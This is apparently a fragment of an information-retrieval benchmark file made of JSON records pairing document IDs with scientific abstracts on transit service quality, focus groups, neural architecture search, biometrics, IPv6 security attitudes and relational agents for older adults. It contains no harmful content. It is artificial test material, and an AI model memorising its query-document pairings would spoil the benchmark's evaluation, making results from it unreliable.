"text": "In this paper, an index based on customer perspective is proposed for evaluating transit service quality. The index, named Heterogeneous Customer Satisfaction Index, is inspired by the traditional Customer Satisfaction Index, but takes into account the heterogeneity among the user judgments about the different service aspects. The index allows service quality to be monitored, the causes generating customer satisfaction/dissatisfaction to be identified, and the strategies for improving the service quality to be defined. The proposed methodologies show some advantages compared to the others adopted for measuring service quality, because it can be easily applied by the transit operators. Introduction Transit service quality is an aspect markedly influencing travel user choices. Customers who have a good experience with transit will probably use transit services again, while customers who experience problems with transit may not use transit services the next time. For this reason, improving service quality is important for customizing habitual travellers and for attracting new users. Moreover, the need for supplying services characterized by high levels of quality guarantees competition among transit agencies, and, consequently, the user takes advantage of Journal of Public Transportation, Vol. 12, No. 3, 2009 22 better services. To achieve these goals, transit agencies must measure their performance. Customer satisfaction represents a measure of company performance according to customer needs (Hill et al. 2003); therefore, the measure of customer satisfaction provides a service quality measure. Customers express their points of view about the services by providing judgments on some service aspects by means of ad hoc experimental sample surveys, known in the literature as “customer satisfaction surveys.” The aspects generally describing transit services can be distinguished into the characteristics that more properly describe the service (e.g., service frequency), and less easily measurable characteristics that depend more on customer tastes (e.g., comfort). In the literature, there are many studies about transit service quality. Examples of the most recent research are reported in TRB (2003a, 2003b), Eboli and Mazzulla (2007), Tyrinopoulos and Antoniou (2008), Iseki and Taylor (2008), and Joewono and Kubota (2007). In these studies, different attributes determining transit service quality are discussed; the main service aspects characterizing a transit service include service scheduling and reliability, service coverage, information, comfort, cleanliness, and safety and security. Service scheduling can be defined by service frequency (number of runs per hour or per day) and service time (time during which the service is available). Service reliability concerns the regularity of runs that are on schedule and on time; an unreliable service does not permit user travel times to be optimized. Service coverage concerns service availability in the space and is expressed through line path characteristics, number of stops, distance between stops, and accessibility of stops. Information consists of indications about departure and arrival scheduled times of the runs, boarding/alighting stop location, ticket costs, and so on. Comfort refers to passenger personal comfort while transit is used, including climate control, seat comfort, ride comfort including the severity of acceleration and braking, odors, and vehicle noise. Cleanliness refers to the internal and external cleanliness of vehicles and cleanliness of terminals and stops. Safety concerns the possibility that users can be involved in an accident, and security concerns personal security against crimes. Other service aspects characterizing transit services concern fares, personnel appearance and helpfulness, environmental protection, and customer services such ease of purchasing tickets and administration of complaints. The objective of this research is to provide a tool for measuring the overall transit service quality, taking into account user judgments about different service aspects. A New Customer Satisfaction Index for Evaluating Transit Service Quality 23 A synthetic index of overall satisfaction is proposed, which easily can be used by transit agencies for monitoring service performance. In the next section, a critical review of indexes for measuring service quality from a user perspective is made; observations and remarks emerge from the comparison among the indexes analysed. Because of the disadvantages of the indexes reported in the literature, a new index is proposed. The proposed methodology is applied by using experimental data collected by a customer satisfaction survey of passengers of a suburban transit service. The obtained results are discussed at the end of the paper. Customer Satisfaction Indexes The concept of customer satisfaction as a measure of perceived service quality was introduced in market research. In this field, many customer satisfaction techniques have been developed. The best known and most widely applied technique is the ServQual method, proposed by Parasuraman et al. (1985). The ServQual method introduced the concept of customer satisfaction as a function of customer expectations (what customers expect from the service) and perceptions (what customers receive). The method was developed to assess customer perceptions of service quality in retail and service organizations. In the method, 5 service quality dimensions and 22 items for measuring service quality are defined. Service quality dimensions are tangibles, reliability, responsiveness, assurance, and empathy. The method is in the form of a questionnaire that uses a Likert scale on seven levels of agreement/disagreement (from “strongly disagree” to “strongly agree”). ServQual provides an index calculated through the difference between perception and expectation rates expressed for the items, weighted as a function of the five service quality dimensions embedding the items. Some variations of this method were introduced in subsequent years. For example, Cronin and Taylor (1994) introduced the ServPerf method, and Teas (1993) proposed a model named Normed Quality (NQ). Although ServQual represents the most widely adopted method for measuring service quality, the adopted scale of measurement for capturing customer judgments has some disadvantages in obtaining an overall numerical measure of service quality; in fact, to calculate an index, the analyst is forced to assign a numerical code to each level of judgment. In this way, equidistant numbers are assigned to each qualitative point of the scale; this operation presumes that the distances between two consecutive levels of judgment expressed by the customers have the same size. Journal of Public Transportation, Vol. 12, No. 3, 2009 24 A number of both national and international indexes also based on customer perceptions and expectations have been introduced in the last decade. For the most part, these satisfaction indexes are embedded within a system of cause-and-effect relationships or satisfaction models. The models also contain latent or unobservable variables and provide a reliable satisfaction index (Johnson et al. 2001). The Swedish Customer Satisfaction Barometer (SCSB) was established in 1989 and is the first national customer satisfaction index for domestically purchased and consumed products and services (Fornell 1992). The American Customer Satisfaction Index (ACSI) was introduced in the fall of 1994 (Fornell et al. 1996). The Norwegian Customer Satisfaction Barometer (NCSB) was introduced in 1996 (Andreassen and Lervik 1999; Andreassen and Lindestad 1998). The most recent development among these indexes is the European Customer Satisfaction Index (ECSI) (Eklof 2000). The original SCSB model is based on customer perceptions and expectations regarding products or services. All the other models are based on the same concepts, but they differ from the original regarding the variables considered and the cause-and-effect relationships introduced. The models from which these indexes are derived have a very complex structure. In addition, model coefficient estimation needs of large quantities of experimental data and the calibration procedure are not easily workable. For this reason, this method is not very usable by transit agencies, particularly for monitoring service quality. More recently, an index based on discrete choice models and random utility theory has been introduced. The index, named Service Quality Index (SQI), is calculated by the utility function of a choice alternative representing a service (Hensher and Prioni 2002). The user makes a choice between the service habitually used and hypothetical services. Hypothetical services are defined through Stated Preferences (SP) techniques by varying the level of quality of aspects characterizing the service. Habitual service is described by the user by assigning a value to each service aspect. The design of this type of SP experiments is generally very complex; an example of an SP experimental design was introduced by Eboli and Mazzulla (2008a). SQI was firstly calculated by a Multinomial Logit model to evaluate the level of quality of transit services. Hierarchical Logit models were introduced for calculating SQI by Hensher et al. (2003) and Marcucci and Gatta (2007). Mixed Logit models were introduced by Hensher (2001) and Eboli and Mazzulla (2008b). SQI includes, indirectly, the concept of satisfaction as a function of customer expectations and perceptions. The calculation of the indexes following approaches different from SQI presumes the use of customer judgments in terms of rating. To the contrary, SQI is based on choice data; nevertheless, by choosing a service, the user indirectly A New Customer Satisfaction Index for Evaluating Transit Service Quality 25 expresses a judgment of importance on the service aspects defining the services. In addition, the user expres",
"title": ""
},
{
"docid": "e711f9f57e1c3c22c762bf17cb6afd2b",
"text": "Qualitative research methodology has become an established part of the medical education research field. A very popular data-collection technique used in qualitative research is the \"focus group\". Focus groups in this Guide are defined as \"… group discussions organized to explore a specific set of issues … The group is focused in the sense that it involves some kind of collective activity … crucially, focus groups are distinguished from the broader category of group interview by the explicit use of the group interaction as research data\" (Kitzinger 1994, p. 103). This Guide has been designed to provide people who are interested in using focus groups with the information and tools to organize, conduct, analyze and publish sound focus group research within a broader understanding of the background and theoretical grounding of the focus group method. The Guide is organized as follows: Firstly, to describe the evolution of the focus group in the social sciences research domain. Secondly, to describe the paradigmatic fit of focus groups within qualitative research approaches in the field of medical education. After defining, the nature of focus groups and when, and when not, to use them, the Guide takes on a more practical approach, taking the reader through the various steps that need to be taken in conducting effective focus group research. Finally, the Guide finishes with practical hints towards writing up a focus group study for publication.",
"title": ""
},
{
"docid": "1c39ffe697fe2f64c9c6b71cc8ba3652",
"text": "Mouse dynamics is the process of identifying individual users based on their mouse operating characteristics. Although previous work has reported some promising results, mouse dynamics is still a newly emerging technique and has not reached an acceptable level of performance. One of the major reasons is intrinsic behavioral variability. This study presents a novel approach by using pattern-growth-based mining method to extract frequent-behavior segments in obtaining stable mouse characteristics, employing one-class classification algorithms to perform the task of continuous user authentication. Experimental results show that mouse characteristics extracted from frequent-behavior segments are much more stable than those from holistic behavior, and the approach achieves a practically useful level of performance with FAR of 0.37% and FRR of 1.12%. These findings suggest that mouse dynamics suffice to be a significant enhancement for a traditional authentication system. Our dataset is publicly available to facilitate future research.",
"title": ""
},
{
"docid": "788b88aef3d606c4496633a35a277433",
"text": "Modern hardware and software development has led to an evolution of user interfaces from command-line to natural user interfaces for virtual immersive environments. Gestures imitating real-world interaction tasks increasingly replace classical two-dimensional interfaces based on Windows/Icons/Menus/Pointers (WIMP) or touch metaphors. Thus, the purpose of this paper is to survey the state-of-the-art Human-Computer Interaction (HCI) techniques with a focus on the special field of three-dimensional interaction. This includes an overview of currently available interaction devices, their applications of usage and underlying methods for gesture design and recognition. Focus is on interfaces based on the Leap Motion Controller (LMC) and corresponding methods of gesture design and recognition. Further, a review of evaluation methods for the proposed natural user interfaces is given.",
"title": ""
},
{
"docid": "686a8e474cece7380d3401a023e678e9",
"text": "This paper introduces SDWS (Semantic Description of Web Services), a Web tool which generates semantic descriptions from collections of Web services. The fundamental approach of SDWS consists of the integration of a set of ontological models for the representation of different Web service description languages and models. The main contributions of this proposal are (i) a general ontological model for the representation of Web services, (ii) a set of language-specific ontological models for the representation of different Web service descriptions implementations, and (iii) a set of software modules that automatically parse Web service descriptions and produce their respective ontological representation. The design of the generic service model incorporates the common elements that all service descriptions share: a service name, a set of operations, and input and output parameters; together with other important elements that semantic models define: preconditions and effects. Experimental results show that the automatic generation of semantic descriptions from public Web services is feasible and represents an important step towards the integration of a general semantic service registry.",
"title": ""
},
{
"docid": "52de47c3253e1235a0609e207d252445",
"text": "Label propagation is a popular graph-based semisupervised learning framework. So as to obtain the optimal labeling scores, the label propagation algorithm requires an inverse matrix which incurs the high computational cost of O(n+cn), where n and c are the numbers of data points and labels, respectively. This paper proposes an efficient label propagation algorithm that guarantees exactly the same labeling results as those yielded by optimal labeling scores. The key to our approach is to iteratively compute lower and upper bounds of labeling scores to prune unnecessary score computations. This idea significantly reduces the computational cost to O(cnt) where t is the average number of iterations for each label and t ≪ n in practice. Experiments demonstrate the significant superiority of our algorithm over existing label propagation methods.",
"title": ""
},
{
"docid": "56c61887f762d5e12f7bb2e8f1b2160b",
"text": "BACKGROUND\nAdequate fruit and vegetable intake has been found to promote health and reduce the risk of several cancers and chronic diseases. Understanding the psychological determinants of fruit and vegetable intake is needed to design effective intervention programs.\n\n\nMETHODS\nPapers published in English from 1994 to 2006 that described the relationship between psychosocial predictors and fruit and vegetable intake in adults were reviewed. Studies and their constructs were independently rated based on the direction of significant effects, quality of execution, design suitability, and frequency. Methodology from the Guide to Community Preventive Services was used to systematically review and synthesize findings.\n\n\nRESULTS\nTwenty-five psychosocial constructs spanning 35 studies were reviewed (14 prospective and 21 cross-sectional/descriptive studies). Strong evidence was found for self-efficacy, social support, and knowledge as predictors of adult fruit and vegetable intake. Weaker evidence was found for variables including barriers, intentions, attitudes/beliefs, stages of change, and autonomous motivation.\n\n\nCONCLUSIONS\nThe findings underscore the need to design future behavioral interventions that use strong experimental designs with efficacious constructs and to conduct formal mediation analyses to determine the strength of these potential predictors of fruit and vegetable intake.",
"title": ""
},
{
"docid": "8184d4b1ee1b9877990e14941f517efa",
"text": "Neural architecture search (NAS) has a great impact by automatically designing effective neural network architectures. However, the prohibitive computational demand of conventional NAS algorithms (e.g. 10 GPU hours) makes it difficult to directly search the architectures on large-scale tasks (e.g. ImageNet). Differentiable NAS can reduce the cost of GPU hours via a continuous representation of network architecture but suffers from the high GPU memory consumption issue (grow linearly w.r.t. candidate set size). As a result, they need to utilize proxy tasks, such as training on a smaller dataset, or learning with only a few blocks, or training just for a few epochs. These architectures optimized on proxy tasks are not guaranteed to be optimal on target task. In this paper, we present ProxylessNAS that can directly learn the architectures for large-scale target tasks and target hardware platforms. We address the high memory consumption issue of differentiable NAS and reduce the computational cost (GPU hours and GPU memory) to the same level of regular training while still allowing a large candidate set. Experiments on CIFAR-10 and ImageNet demonstrate the effectiveness of directness and specialization. On CIFAR-10, our model achieves 2.08% test error with only 5.7M parameters, better than the previous state-of-the-art architecture AmoebaNet-B, while using 6× fewer parameters. On ImageNet, our model achieves 3.1% better top-1 accuracy than MobileNetV2, while being 1.2× faster with measured GPU latency. We also apply ProxylessNAS to specialize neural architectures for hardware with direct hardware metrics (e.g. latency) and provide insights for efficient CNN architecture design.1 1 INTRODUCTION Neural architecture search (NAS) has demonstrated much success in automating neural network architecture design for various deep learning tasks, such as image recognition (Zoph et al., 2018; Cai et al., 2018a; Liu et al., 2018a; Zhong et al., 2018) and language modeling (Zoph & Le, 2017). Despite the remarkable results, conventional NAS algorithms are prohibitively computation-intensive, requiring to train thousands of models on the target task in a single experiment. Therefore, directly applying NAS to a large-scale task (e.g. ImageNet) is computationally expensive or impossible, which makes it difficult for making practical industry impact. As a trade-off, Zoph et al. (2018) propose to search for building blocks on proxy tasks, such as training for fewer epochs, starting with a smaller dataset (e.g. CIFAR-10), or learning with fewer blocks. Then top-performing blocks are stacked and transferred to the large-scale target task. This paradigm has been widely adopted in subsequent NAS algorithms (Liu et al., 2018a;b; Real et al., 2018; Cai et al., 2018b; Liu et al., 2018c; Tan et al., 2018; Luo et al., 2018). However, these blocks optimized on proxy tasks are not guaranteed to be optimal on target task, especially when taking hardware metrics such as latency into consideration. More importantly, to enable transferability, such methods need to search for only a few architectural motifs and then repeatedly stack the same pattern, which restricts the block diversity and thereby harms performance. In this work, we propose a simple and effective solution to the aforementioned limitations, called ProxylessNAS, which directly learns the architectures on the target task and hardware instead of with Pretrained models and evaluation code are released at https://github.com/MIT-HAN-LAB/ProxylessNAS. 1 ar X iv :1 81 2. 00 33 2v 1 [ cs .L G ] 2 D ec 2 01 8 Proxy Task Learner Target Task & Hardware Transfer (1) Previous proxy-based approach (2) Our proxy-less approach Architecture Updates Architecture Updates Target Task & Hardware Learner Normal Train NAS
Need Meta Controller Need Proxy DARTS & One-shot No Meta Controller Need Proxy Proxyless (Ours)
No Meta Controller No Proxy GPU Hours GPU Memory Figure 1: ProxylessNAS directly optimizes neural network architectures on target task and hardware. Benefit from the directness and specialization, ProxylessNAS can achieve remarkably better results than previous proxy-based approaches. proxy (Figure 1). We also remove the restriction of repeating blocks in previous NAS works (Zoph et al., 2018; Liu et al., 2018c) and allow all of the blocks to be learned and specified. To achieve this, we reduce the computational cost (GPU hours and GPU memory) of architecture search to the same level of regular training in the following ways. GPU hour-wise, inspired by recent works (Liu et al., 2018c; Bender et al., 2018), we formulate NAS as a path-level pruning process. Specifically, we directly train an over-parameterized network that contains all candidate paths (Figure 2). During training, we explicitly introduce architecture parameters to learn which paths are redundant, while these redundant paths are pruned at the end of training to get a compact optimized architecture. In this way, we only need to train a single network without any meta-controller (or hypernetwork) during architecture search. However, naively including all the candidate paths leads to GPU memory explosion (Liu et al., 2018c; Bender et al., 2018), as the memory consumption grows linearly w.r.t. the number of choices. Thus, GPU memory-wise, we binarize the architecture parameters (1 or 0) and force only one path to be active at run-time, which reduces the required m mory to the same lev l of tr ining a compact model. We propose a gradient-based approach to train these binarized parameters based on BinaryConnect (Courbariaux et al., 2015). Furthermore, to handle non-differentiable hardware objectives (using latency as an example) for learning specialized network architectures on target hardware, we model network latency as a continuous function and optimize it as regularization loss. Additionally, we also present a REINFORCE-based (Williams, 1992) algorithm as an alternative strategy to handle hardware metrics. In our experiments on CIFAR-10 and ImageNet, benefit from the directness and specialization, our method can achieve strong empirical results. On CIFAR-10, our model reaches 2.08% test error with only 5.7M parameters. On ImageNet, our model achieves 75.1% top-1 accuracy which is 3.1% higher than MobileNetV2 (Sandler et al., 2018) while being 1.2× faster. Our contributions can be summarized as follows: • ProxylessNAS is the first NAS algorithm that directly learns architectures on the largescale dataset (e.g. ImageNet) without any proxy while still allowing a large candidate set and removing the restriction of repeating blocks. It effectively enlarged the search space and achieved better performance. • We provide a new path-level pruning perspective for NAS, showing a close connection between NAS and model compression (Han et al., 2016). We save the memory consumption by one order of magnitude by using path-level binarization. • We propose a novel gradient-based approach (latency regularization loss) for handling hardware objectives (e.g. latency). Given different hardware platforms: CPU/GPU/FPGA/TPU/NPU, ProxylessNAS enables hardware-aware neural network specialization that’s exactly optimized for the target hardware. To our best knowledge, it is the first work to study specialized neural network architectures for different hardware architectures. • Extensive experiments showed the advantage of the directness property and the specialization property of ProxylessNAS. It achieved state-of-the-art accuracy performances on CIFAR-10 and ImageNet under latency constraints on different hardware platforms (GPU, CPU and mobile phone). We also analyze the insights of efficient CNN models specialized for different hardware platforms and raise the awareness that specialized neural network architecture is needed on different hardware architectures for efficient inference. 2 2 RELATED WORK The use of machine learning techniques, such as reinforcement learning or neuro-evolution, to replace human experts in designing neural network architectures, usually referred to as neural architecture search, has drawn an increasing interest (Zoph & Le, 2017; Liu et al., 2018a;b;c; Cai et al., 2018a;b; Pham et al., 2018; Brock et al., 2018; Bender et al., 2018; Elsken et al., 2017; 2018b). In NAS, architecture search is typically considered as a meta-learning process, and a meta-controller (e.g. a recurrent neural network (RNN)), is introduced to explore a given architecture space with training a network in the inner loop to get an evaluation for guiding exploration. Consequently, such methods are computationally expensive to run, especially on large-scale tasks, e.g. ImageNet. Some recent works (Brock et al., 2018; Pham et al., 2018) try to improve the efficiency of this meta-learning process by reducing the cost of getting an evaluation. In Brock et al. (2018), a hypernetwork is utilized to generate weights for each sampled network and hence can evaluate the architecture without training it. Similarly, Pham et al. (2018) propose to share weights among all sampled networks under the standard NAS framework (Zoph & Le, 2017). These methods speed up architecture search by orders of magnitude, however, they require a hypernetwork or an RNN controller and mainly focus on small-scale tasks (e.g. CIFAR) rather than large-scale tasks (e.g. ImageNet). Our work is most closely related to One-Shot (Bender et al., 2018) and DARTS (Liu et al., 2018c), both of which get rid of the meta-controller (or hypernetwork) by modeling NAS as a single training process of an over-parameterized network that comprises all candidate paths. Specifically, OneShot trains the over-parameterized network with DropPath (Zoph et al., 2018) that drops out each path with some fixed probability. Then they use the pre-trained over-parameterized network to evaluate architectures, which are sampled by randomly zeroing out paths. DARTS additionally introduces a real-valued architecture parameter fo",
"title": ""
},
{
"docid": "dd840a0e33da0fc4e74fb2441d22c769",
"text": "The evolution of IPv6 technology had become a worldwide trend and showed a significant increase, particularly with the near-coming era named “Internet of Things” or so-called IOT. Concomitant with the transition process from version 4 to version 6, there are open security hole that considered to be vulnerable, mainly against cyber-attacks that poses a threat to companies implements IPv6 network topology. The purpose of this research is to create a model of acceptance of the factors that influenced the behavior of individuals in providing security within IPv6 network topology and analysis of factors that affects the acceptance of individuals in anticipating security with regards to IPv6 network topology. This study was conducted using both, quantitative method focuses on statistical processing on the result of questionnaire filled by respondents using Structural Equation Modeling (SEM), as well as qualitative method to conduct Focus Group Discussion (FGD) and interviews with experts from various background such as: practitioners, academician and government representatives. The results showed ease of use provides insignificant correlation to the referred behavior of avoiding threat on IPv6 environment.",
"title": ""
},
{
"docid": "9ca27ddd53d13db68a5f2c4477c13967",
"text": "Humans have a remarkable ability to use physical commonsense and predict the effect of collisions. But do they understand the underlying factors? Can they predict if the underlying factors have changed? Interestingly, in most cases humans can predict the effects of similar collisions with different conditions such as changes in mass, friction, etc. It is postulated this is primarily because we learn to model physics with meaningful latent variables. This does not imply we can estimate the precise values of these meaningful variables (estimate exact values of mass or friction). Inspired by this observation, we propose an interpretable intuitive physics model where specific dimensions in the bottleneck layers correspond to different physical properties. In order to demonstrate that our system models these underlying physical properties, we train our model on collisions of different shapes (cube, cone, cylinder, spheres etc.) and test on collisions of unseen combinations of shapes. Furthermore, we demonstrate our model generalizes well even when similar scenes are simulated with different underlying properties.",
"title": ""
},
{
"docid": "34401a7e137cffe44f67e6267f29aa57",
"text": "Future Point-of-Care (PoC) molecular-level diagnosis requires advanced biosensing systems that can achieve high sensitivity and portability at low power consumption levels, all within a low price-tag for a variety of applications such as in-field medical diagnostics, epidemic disease control, biohazard detection, and forensic analysis. Magnetically labeled biosensors are proposed as a promising candidate to potentially eliminate or augment the optical instruments used by conventional fluorescence-based sensors. However, magnetic biosensors developed thus far require externally generated magnetic biasing fields [1–4] and/or exotic post-fabrication processes [1,2]. This limits the ultimate form-factor of the system, total power consumption, and cost. To address these impediments, we present a low-power scalable frequency-shift magnetic particle biosensor array in bulk CMOS, which provides single-bead detection sensitivity without any (electrical or permanent) external magnets.",
"title": ""
}
] | scidocsrr |
ee3e164cc8377cc0f3fdca28d68bb9a3 | 'It's just like you talk to a friend' relational agents for older adults | [
{
"docid": "60c06e137f13c3fd1673feeb97d9e214",
"text": "BACKGROUND\nAnimal-assisted therapy (AAT) is claimed to have a variety of benefits, but almost all published results are anecdotal. We characterized the resident population in long-term care facilities desiring AAT and determined whether AAT can objectively improve loneliness.\n\n\nMETHODS\nOf 62 residents, 45 met inclusion criteria for the study. These 45 residents were administered the Demographic and Pet History Questionnaire (DPHQ) and Version 3 of the UCLA Loneliness Scale (UCLA-LS). They were then randomized into three groups (no AAT; AAT once/week; AAT three times/week; n = 15/group) and retested with the UCLA-LS near the end of the 6-week study.\n\n\nRESULTS\nUse of the DPHQ showed residents volunteering for the study had a strong life-history of emotional intimacy with pets and wished that they currently had a pet. AAT was shown by analysis of covariance followed by pairwise comparison to have significantly reduced loneliness scores in comparison with the no AAT group.\n\n\nCONCLUSIONS\nThe desire for AAT strongly correlates with previous pet ownership. AAT reduces loneliness in residents of long-term care facilities.",
"title": ""
},
{
"docid": "8efee8d7c3bf229fa5936209c43a7cff",
"text": "This research investigates the meaning of “human-computer relationship” and presents techniques for constructing, maintaining, and evaluating such relationships, based on research in social psychology, sociolinguistics, communication and other social sciences. Contexts in which relationships are particularly important are described, together with specific benefits (like trust) and task outcomes (like improved learning) known to be associated with relationship quality. We especially consider the problem of designing for long-term interaction, and define relational agents as computational artifacts designed to establish and maintain long-term social-emotional relationships with their users. We construct the first such agent, and evaluate it in a controlled experiment with 101 users who were asked to interact daily with an exercise adoption system for a month. Compared to an equivalent task-oriented agent without any deliberate social-emotional or relationship-building skills, the relational agent was respected more, liked more, and trusted more, even after four weeks of interaction. Additionally, users expressed a significantly greater desire to continue working with the relational agent after the termination of the study. We conclude by discussing future directions for this research together with ethical and other ramifications of this work for HCI designers.",
"title": ""
}
] | [
{
"docid": "45eb2d7b74f485e9eeef584555e38316",
"text": "With the increasing demand of massive multimodal data storage and organization, cross-modal retrieval based on hashing technique has drawn much attention nowadays. It takes the binary codes of one modality as the query to retrieve the relevant hashing codes of another modality. However, the existing binary constraint makes it difficult to find the optimal cross-modal hashing function. Most approaches choose to relax the constraint and perform thresholding strategy on the real-value representation instead of directly solving the original objective. In this paper, we first provide a concrete analysis about the effectiveness of multimodal networks in preserving the inter- and intra-modal consistency. Based on the analysis, we provide a so-called Deep Binary Reconstruction (DBRC) network that can directly learn the binary hashing codes in an unsupervised fashion. The superiority comes from a proposed simple but efficient activation function, named as Adaptive Tanh (ATanh). The ATanh function can adaptively learn the binary codes and be trained via back-propagation. Extensive experiments on three benchmark datasets demonstrate that DBRC outperforms several state-of-the-art methods in both image2text and text2image retrieval task.",
"title": ""
},
{
"docid": "0551e9faef769350102a404fa0b61dc1",
"text": "Lignocellulosic biomass is a complex biopolymer that is primary composed of cellulose, hemicellulose, and lignin. The presence of cellulose in biomass is able to depolymerise into nanodimension biomaterial, with exceptional mechanical properties for biocomposites, pharmaceutical carriers, and electronic substrate's application. However, the entangled biomass ultrastructure consists of inherent properties, such as strong lignin layers, low cellulose accessibility to chemicals, and high cellulose crystallinity, which inhibit the digestibility of the biomass for cellulose extraction. This situation offers both challenges and promises for the biomass biorefinery development to utilize the cellulose from lignocellulosic biomass. Thus, multistep biorefinery processes are necessary to ensure the deconstruction of noncellulosic content in lignocellulosic biomass, while maintaining cellulose product for further hydrolysis into nanocellulose material. In this review, we discuss the molecular structure basis for biomass recalcitrance, reengineering process of lignocellulosic biomass into nanocellulose via chemical, and novel catalytic approaches. Furthermore, review on catalyst design to overcome key barriers regarding the natural resistance of biomass will be presented herein.",
"title": ""
},
{
"docid": "40746bfccf801222d99151dc4b4cb7e8",
"text": "Fingerprints are the oldest and most widely used form of biometric identification. Everyone is known to have unique, immutable fingerprints. As most Automatic Fingerprint Recognition Systems are based on local ridge features known as minutiae, marking minutiae accurately and rejecting false ones is very important. However, fingerprint images get degraded and corrupted due to variations in skin and impression conditions. Thus, image enhancement techniques are employed prior to minutiae extraction. A critical step in automatic fingerprint matching is to reliably extract minutiae from the input fingerprint images. This paper presents a review of a large number of techniques present in the literature for extracting fingerprint minutiae. The techniques are broadly classified as those working on binarized images and those that work on gray scale images directly.",
"title": ""
},
{
"docid": "e72ce7617cc941543a07059bc3a1a4a2",
"text": "Ensemble learning strategies, especially boosting and bagging decision trees, have demonstrated impressive capacities to improve the prediction accuracy of base learning algorithms. Further gains have been demonstrated by strategies that combine simple ensemble formation approaches. We investigate the hypothesis that the improvement in accuracy of multistrategy approaches to ensemble learning is due to an increase in the diversity of ensemble members that are formed. In addition, guided by this hypothesis, we develop three new multistrategy ensemble learning techniques. Experimental results in a wide variety of natural domains suggest that these multistrategy ensemble learning techniques are, on average, more accurate than their component ensemble learning techniques.",
"title": ""
},
{
"docid": "973da8a50b1250688fceb94611a4f0f7",
"text": "Experts in sport benefit from some cognitive mechanisms and strategies which enables them to reduce response times and increase response accuracy.Reaction time is mediated by different factors including type of sport that athlete is participating in and expertise status. The present study aimed to investigate the relationship between CRTs and expertise level in collegiate athletes, as well as evaluating the role of sport and gender differences.44 male and female athletesrecruited from team and individual sports at elite and non-elite levels. The Lafayette multi-choice reaction time was used to collect data.All subjectsperformed a choice reaction time task that required response to visual and auditory stimuli. Results demonstrated a significant overall choice reaction time advantage for maleathletes, as well as faster responses to stimuli in elite participants.Athletes of team sportsdid not showmore accurate performance on the choice reaction time tasks than athletes of individual sports. These findings suggest that there is a relation between choice reaction time and expertise in athletes and this relationship can be mediated by gender differences. Overall, athletes with intrinsic perceptualmotor advantages such as faster reaction times are potentially more equipped for participation in high levels of sport.",
"title": ""
},
{
"docid": "147052ca81630c605c43c7cfb55ada26",
"text": "We conducted a user study evaluating two preference elicitation approaches based on ratings and personality quizzes respectively. Three criteria were used in this comparative study: perceived accuracy, user effort and user loyalty. Results from our study show that the perceived accuracy in two systems is not significantly different. However, users expended significantly less effort, both perceived cognitive effort and actual task time, to complete the preference profile establishing process in the personality quiz-based system than in the rating-based system. Additionally, users expressed stronger intention to reuse the personality quiz-based system and introduce it to their friends. After using these two systems, 53% of users preferred the personality quiz-based system vs. 13% of users preferred the rating-based system, since most users thought the former is easier to use.",
"title": ""
},
{
"docid": "1a528eb041dac4ab8bf4155e2eb6050a",
"text": "A novel boosted MOS structure with buried n-well current booster providing >2× higher drive current and low off current is experimentally demonstrated on 28 nm bulk silicon technology. TCAD analysis is performed to investigate the boosting mechanism as well as to demonstrate scalability to 7 nm FinFET technology. Constant bias applied to the booster terminal results in a gate voltage controlled body current source intrinsic vertical BJT that only turns on at high gate voltage. The body current then amplifies lateral BJT current. The inherent vertical and lateral BJTs are automatically turned off at low gate voltage, maintaining low off-state current.",
"title": ""
},
{
"docid": "56a3a761606e699c3f21fb0fe1ecbf0a",
"text": "Internet banking (IB) has become one of the widely used banking services among Malaysian retail banking customers in recent years. Despite its attractiveness, customer loyalty towards Internet banking website has become an issue due to stiff competition among the banks in Malaysia. As the development and validation of a customer loyalty model in Internet banking website context in Malaysia had not been addressed by past studies, this study attempts to develop a model based on the usage of Information System (IS), with the purpose to investigate factors influencing customer loyalty towards Internet banking websites. A questionnaire survey was conducted with the sample consisting of Internet banking users in Malaysia. Factors that influence customer loyalty towards Internet banking website in Malaysia have been investigated and tested. The study also attempts to identify the most essential factors among those investigated: service quality, perceived value, trust, habit and reputation of the bank. Based on the findings, trust, habit and reputation are found to have a significant influence on customer loyalty towards individual Internet banking websites in Malaysia. As compared to trust or habit factors, reputation is the strongest influence. The results also indicated that service quality and perceived value are not significantly related to customer loyalty. Service quality is found to be an important factor in influencing the adoption of the technology, but did not have a significant influence in retention of customers. The findings have provided an insight to the internet banking providers on the areas to be focused on in retaining their customers.",
"title": ""
},
{
"docid": "7ffaedeabffcc9816d1eb83a4e4cdfd0",
"text": "In this paper, we propose a new method for calculating the output layer in neural machine translation systems. The method is based on predicting a binary code for each word and can reduce computation time/memory requirements of the output layer to be logarithmic in vocabulary size in the best case. In addition, we also introduce two advanced approaches to improve the robustness of the proposed model: using error-correcting codes and combining softmax and binary codes. Experiments on two English ↔ Japanese bidirectional translation tasks show proposed models achieve BLEU scores that approach the softmax, while reducing memory usage to the order of less than 1/10 and improving decoding speed on CPUs by x5 to x10.",
"title": ""
},
{
"docid": "755f7d663e813d7450089fc0d7058037",
"text": "This paper presents a new approach for learning in structured domains (SDs) using a constructive neural network for graphs (NN4G). The new model allows the extension of the input domain for supervised neural networks to a general class of graphs including both acyclic/cyclic, directed/undirected labeled graphs. In particular, the model can realize adaptive contextual transductions, learning the mapping from graphs for both classification and regression tasks. In contrast to previous neural networks for structures that had a recursive dynamics, NN4G is based on a constructive feedforward architecture with state variables that uses neurons with no feedback connections. The neurons are applied to the input graphs by a general traversal process that relaxes the constraints of previous approaches derived by the causality assumption over hierarchical input data. Moreover, the incremental approach eliminates the need to introduce cyclic dependencies in the definition of the system state variables. In the traversal process, the NN4G units exploit (local) contextual information of the graphs vertices. In spite of the simplicity of the approach, we show that, through the compositionality of the contextual information developed by the learning, the model can deal with contextual information that is incrementally extended according to the graphs topology. The effectiveness and the generality of the new approach are investigated by analyzing its theoretical properties and providing experimental results.",
"title": ""
},
{
"docid": "a424b935e6165a71b5f17d9a61350f75",
"text": "Understanding how biological visual systems recognize objects is one of the ultimate goals in computational neuroscience. From the computational viewpoint of learning, different recognition tasks, such as categorization and identification, are similar, representing different trade-offs between specificity and invariance. Thus, the different tasks do not require different classes of models. We briefly review some recent trends in computational vision and then focus on feedforward, view-based models that are supported by psychophysical and physiological data.",
"title": ""
},
{
"docid": "dea52c761a9f4d174e9bd410f3f0fa38",
